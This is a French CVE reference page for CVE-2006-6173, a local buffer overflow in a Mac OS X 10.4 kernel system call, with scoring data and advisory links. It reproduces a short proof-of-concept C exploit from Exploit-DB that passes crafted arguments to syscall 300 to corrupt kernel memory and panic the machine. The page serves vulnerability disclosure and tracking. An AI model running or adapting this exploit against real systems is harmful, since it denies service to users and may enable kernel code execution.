CVE-2006-6173 : Détail

CVE-2006-6173

0.22%V4
Local
2006-11-30
15h00 +00:00
2017-07-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the shared_region_make_private_np function in vm/vm_unix.c in Mac OS X 10.4.6 and earlier allows local users to execute arbitrary code via (1) a small range count, which causes insufficient memory allocation, or (2) a large number of ranges in the shared_region_make_private_np_args parameter.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29201

Date de publication : 2006-11-28 23h00 +00:00
Auteur : LMH
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/21349/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. */ /* * Copyright 2006 (c) LMH <lmh@info-pull.com>. * All Rights Reserved. * ---- * .---. .---. * : : o : me want cookie and clues! L0W LEVA! - A J. H * _..-: o : :-.._ / * .-'' ' `---' `---' " ``-. * .' " ' " . " . ' " `. * : '.---.,,.,...,.,.,.,..---. ' ; * `. " `. .' " .' kudos to ilja, kevin and icer. * `. '`. .' ' .' "proof of concept" for * `. `-._ _.-' " .' .-------. MOKB-28-11-2006. * `. " '"--...--"' . ' .' .' · o ·`. * .'`-._' " . " _.-'`. : C o C o A : * .' ```--.....--''' ' `:_ o o : * .' " ' " " ; `.;";";"; _' * ; ' " ' . ; .' ; ; ; * ; ' ' ' " .' .-' * ' " " ' " " _.-' */ #include <stdio.h> #include <sys/types.h> #include <fcntl.h> int main() { /* shared_region_make_private_np = 300 (xnu-792.6.70), 3rd arg unused */ syscall(300, 0x8000000, 0xdeadface, 0xffffffff); return 0; }

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.4.6

Références

http://secunia.com/advisories/23120
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA07-072A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/21349
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1017306
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securitytracker.com/id?1017751
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0930
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/4762
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24479
Tags : third-party-advisory, x_refsource_SECUNIA